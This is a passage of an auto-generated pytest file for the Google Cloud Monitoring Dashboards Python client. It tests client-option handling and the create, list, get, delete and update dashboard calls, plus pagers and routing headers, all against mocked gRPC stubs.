            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,grpc_helpers",
    [
        (
            DashboardsServiceClient,
            transports.DashboardsServiceGrpcTransport,
            "grpc",
            grpc_helpers,
        ),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
            grpc_helpers_async,
        ),
    ],
)
def test_dashboards_service_client_client_options_credentials_file(
    client_class, transport_class, transport_name, grpc_helpers
):
    """A credentials_file given via client_options is forwarded to the
    transport constructor unchanged."""
    # Check the case credentials file is provided.
    options = client_options.ClientOptions(credentials_file="credentials.json")

    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
def test_dashboards_service_client_client_options_from_dict():
    """client_options may be given as a plain dict; the api_endpoint key is
    forwarded to the gRPC transport as the host."""
    with mock.patch(
        "google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceGrpcTransport.__init__"
    ) as grpc_transport:
        grpc_transport.return_value = None
        client = DashboardsServiceClient(
            client_options={"api_endpoint": "squid.clam.whelk"}
        )
        grpc_transport.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,grpc_helpers",
    [
        (
            DashboardsServiceClient,
            transports.DashboardsServiceGrpcTransport,
            "grpc",
            grpc_helpers,
        ),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
            grpc_helpers_async,
        ),
    ],
)
def test_dashboards_service_client_create_channel_credentials_file(
    client_class, transport_class, transport_name, grpc_helpers
):
    """Credentials loaded from a credentials_file are the ones used when the
    gRPC channel is created (not the ADC defaults)."""
    # Check the case credentials file is provided.
    options = client_options.ClientOptions(credentials_file="credentials.json")

    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )

    # test that the credentials from file are saved and used as the credentials.
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch.object(
        google.auth, "default", autospec=True
    ) as adc, mock.patch.object(
        grpc_helpers, "create_channel"
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        file_creds = ga_credentials.AnonymousCredentials()
        load_creds.return_value = (file_creds, None)
        adc.return_value = (creds, None)
        client = client_class(client_options=options, transport=transport_name)
        create_channel.assert_called_with(
            "monitoring.googleapis.com:443",
            credentials=file_creds,
            credentials_file=None,
            quota_project_id=None,
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/monitoring",
                "https://www.googleapis.com/auth/monitoring.read",
                "https://www.googleapis.com/auth/monitoring.write",
            ),
            scopes=None,
            default_host="monitoring.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize(
    "request_type", [dashboards_service.CreateDashboardRequest, dict,]
)
def test_create_dashboard(request_type, transport: str = "grpc"):
    """create_dashboard calls the gRPC stub exactly once with the request
    proto and surfaces the mocked response fields on the returned Dashboard."""
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = dashboard.Dashboard(
            name="name_value",
            display_name="display_name_value",
            etag="etag_value",
            grid_layout=layouts.GridLayout(columns=769),
        )
        response = client.create_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.CreateDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
def test_create_dashboard_empty_call():
    """Calling create_dashboard with no arguments still sends a default
    CreateDashboardRequest to the stub."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
        client.create_dashboard()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.CreateDashboardRequest()
@pytest.mark.asyncio
async def test_create_dashboard_async(
    transport: str = "grpc_asyncio",
    request_type=dashboards_service.CreateDashboardRequest,
):
    """Async variant: create_dashboard awaits the stub and returns the
    mocked Dashboard with its fields intact."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            dashboard.Dashboard(
                name="name_value", display_name="display_name_value", etag="etag_value",
            )
        )
        response = await client.create_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.CreateDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_create_dashboard_async_from_dict():
    """Async create_dashboard also accepts a plain dict request."""
    await test_create_dashboard_async(request_type=dict)
def test_create_dashboard_field_headers():
    """Routing fields in the request are propagated as the
    x-goog-request-params metadata header."""
    client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.CreateDashboardRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
        call.return_value = dashboard.Dashboard()
        client.create_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_dashboard_field_headers_async():
    """Async variant of the routing-header check for create_dashboard."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.CreateDashboardRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
        await client.create_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.parametrize(
    "request_type", [dashboards_service.ListDashboardsRequest, dict,]
)
def test_list_dashboards(request_type, transport: str = "grpc"):
    """Exercise list_dashboards over a mocked gRPC stub and check the response mapping."""
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = dashboards_service.ListDashboardsResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_dashboards(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.ListDashboardsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListDashboardsPager)
    assert response.next_page_token == "next_page_token_value"
def test_list_dashboards_empty_call():
    """Calling list_dashboards with no arguments sends a default empty request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        client.list_dashboards()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.ListDashboardsRequest()
@pytest.mark.asyncio
async def test_list_dashboards_async(
    transport: str = "grpc_asyncio",
    request_type=dashboards_service.ListDashboardsRequest,
):
    """Async variant: exercise list_dashboards over a mocked stub."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            dashboards_service.ListDashboardsResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_dashboards(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.ListDashboardsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListDashboardsAsyncPager)
    assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_dashboards_async_from_dict():
    """Re-run the async list_dashboards test with a dict-typed request."""
    await test_list_dashboards_async(request_type=dict)
def test_list_dashboards_field_headers():
    """Verify ``parent`` is forwarded as an x-goog-request-params header."""
    client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.ListDashboardsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        call.return_value = dashboards_service.ListDashboardsResponse()
        client.list_dashboards(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_dashboards_field_headers_async():
    """Async variant: verify ``parent`` is sent as an x-goog-request-params header."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.ListDashboardsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            dashboards_service.ListDashboardsResponse()
        )
        await client.list_dashboards(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_dashboards_pager(transport_name: str = "grpc"):
    """Verify the sync pager flattens all pages and carries routing metadata.

    Fix: pass an ``AnonymousCredentials`` *instance* to the client — the
    class object was being passed before (missing ``()``), inconsistent
    with every other test in this module.
    """
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport_name,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        # Set the response to a series of pages.
        call.side_effect = (
            dashboards_service.ListDashboardsResponse(
                dashboards=[
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                ],
                next_page_token="abc",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[], next_page_token="def",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
            ),
            RuntimeError,
        )

        # The pager should carry the routing header for the (empty) parent.
        metadata = ()
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
        pager = client.list_dashboards(request={})

        assert pager._metadata == metadata

        # Iterating the pager walks every Dashboard across all pages.
        results = list(pager)
        assert len(results) == 6
        assert all(isinstance(i, dashboard.Dashboard) for i in results)
def test_list_dashboards_pages(transport_name: str = "grpc"):
    """Verify ``pages`` yields one raw page per mocked response.

    Fix: pass an ``AnonymousCredentials`` *instance* to the client — the
    class object was being passed before (missing ``()``), inconsistent
    with every other test in this module.
    """
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport_name,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
        # Set the response to a series of pages.
        call.side_effect = (
            dashboards_service.ListDashboardsResponse(
                dashboards=[
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                ],
                next_page_token="abc",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[], next_page_token="def",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
            ),
            RuntimeError,
        )
        pages = list(client.list_dashboards(request={}).pages)
        # Each page exposes the raw response; the final page has no token.
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_dashboards_async_pager():
    """Verify the async pager flattens all pages into Dashboard items.

    Fix: pass an ``AnonymousCredentials`` *instance* to the client — the
    class object was being passed before (missing ``()``), inconsistent
    with every other test in this module.
    """
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_dashboards), "__call__", new_callable=mock.AsyncMock
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            dashboards_service.ListDashboardsResponse(
                dashboards=[
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                ],
                next_page_token="abc",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[], next_page_token="def",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
            ),
            RuntimeError,
        )
        async_pager = await client.list_dashboards(request={},)
        assert async_pager.next_page_token == "abc"

        # Async iteration yields every Dashboard across all pages.
        responses = []
        async for response in async_pager:
            responses.append(response)

        assert len(responses) == 6
        assert all(isinstance(i, dashboard.Dashboard) for i in responses)
@pytest.mark.asyncio
async def test_list_dashboards_async_pages():
    """Verify async ``pages`` yields one raw page per mocked response.

    Fix: pass an ``AnonymousCredentials`` *instance* to the client — the
    class object was being passed before (missing ``()``), inconsistent
    with every other test in this module.
    """
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_dashboards), "__call__", new_callable=mock.AsyncMock
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            dashboards_service.ListDashboardsResponse(
                dashboards=[
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                    dashboard.Dashboard(),
                ],
                next_page_token="abc",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[], next_page_token="def",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
            ),
            dashboards_service.ListDashboardsResponse(
                dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_dashboards(request={})).pages:
            pages.append(page_)
        # Each page exposes the raw response; the final page has no token.
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
    "request_type", [dashboards_service.GetDashboardRequest, dict,]
)
def test_get_dashboard(request_type, transport: str = "grpc"):
    """Exercise get_dashboard over a mocked gRPC stub and check field mapping."""
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = dashboard.Dashboard(
            name="name_value",
            display_name="display_name_value",
            etag="etag_value",
            grid_layout=layouts.GridLayout(columns=769),
        )
        response = client.get_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.GetDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
def test_get_dashboard_empty_call():
    """Calling get_dashboard with no arguments sends a default empty request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
        client.get_dashboard()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.GetDashboardRequest()
@pytest.mark.asyncio
async def test_get_dashboard_async(
    transport: str = "grpc_asyncio", request_type=dashboards_service.GetDashboardRequest
):
    """Async variant: exercise get_dashboard over a mocked stub."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            dashboard.Dashboard(
                name="name_value", display_name="display_name_value", etag="etag_value",
            )
        )
        response = await client.get_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.GetDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_get_dashboard_async_from_dict():
    """Re-run the async get_dashboard test with a dict-typed request."""
    await test_get_dashboard_async(request_type=dict)
def test_get_dashboard_field_headers():
    """Verify ``name`` is forwarded as an x-goog-request-params header."""
    client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.GetDashboardRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
        call.return_value = dashboard.Dashboard()
        client.get_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_dashboard_field_headers_async():
    """Async variant: verify ``name`` is sent as an x-goog-request-params header."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.GetDashboardRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
        await client.get_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.parametrize(
    "request_type", [dashboards_service.DeleteDashboardRequest, dict,]
)
def test_delete_dashboard(request_type, transport: str = "grpc"):
    """Exercise delete_dashboard over a mocked gRPC stub; expects a None result."""
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.DeleteDashboardRequest()

    # Establish that the response is the type that we expect.
    assert response is None
def test_delete_dashboard_empty_call():
    """Calling delete_dashboard with no arguments sends a default empty request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
        client.delete_dashboard()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.DeleteDashboardRequest()
@pytest.mark.asyncio
async def test_delete_dashboard_async(
    transport: str = "grpc_asyncio",
    request_type=dashboards_service.DeleteDashboardRequest,
):
    """Async variant: exercise delete_dashboard over a mocked stub."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.DeleteDashboardRequest()

    # Establish that the response is the type that we expect.
    assert response is None
@pytest.mark.asyncio
async def test_delete_dashboard_async_from_dict():
    """Re-run the async delete_dashboard test with a dict-typed request."""
    await test_delete_dashboard_async(request_type=dict)
def test_delete_dashboard_field_headers():
    """Verify ``name`` is forwarded as an x-goog-request-params header."""
    client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.DeleteDashboardRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
        call.return_value = None
        client.delete_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_dashboard_field_headers_async():
    """Async variant: verify ``name`` is sent as an x-goog-request-params header."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.DeleteDashboardRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.parametrize(
    "request_type", [dashboards_service.UpdateDashboardRequest, dict,]
)
def test_update_dashboard(request_type, transport: str = "grpc"):
    """Exercise update_dashboard over a mocked gRPC stub and check field mapping."""
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = dashboard.Dashboard(
            name="name_value",
            display_name="display_name_value",
            etag="etag_value",
            grid_layout=layouts.GridLayout(columns=769),
        )
        response = client.update_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.UpdateDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
def test_update_dashboard_empty_call():
    """Calling update_dashboard with no arguments sends a default empty request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
        client.update_dashboard()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.UpdateDashboardRequest()
@pytest.mark.asyncio
async def test_update_dashboard_async(
    transport: str = "grpc_asyncio",
    request_type=dashboards_service.UpdateDashboardRequest,
):
    """Async variant: exercise update_dashboard over a mocked stub."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            dashboard.Dashboard(
                name="name_value", display_name="display_name_value", etag="etag_value",
            )
        )
        response = await client.update_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == dashboards_service.UpdateDashboardRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, dashboard.Dashboard)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_update_dashboard_async_from_dict():
    """Re-run the async update_dashboard test with a dict-typed request."""
    await test_update_dashboard_async(request_type=dict)
def test_update_dashboard_field_headers():
    """Verify the nested ``dashboard.name`` is sent as an x-goog-request-params header."""
    client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.UpdateDashboardRequest()
    request.dashboard.name = "dashboard.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
        call.return_value = dashboard.Dashboard()
        client.update_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
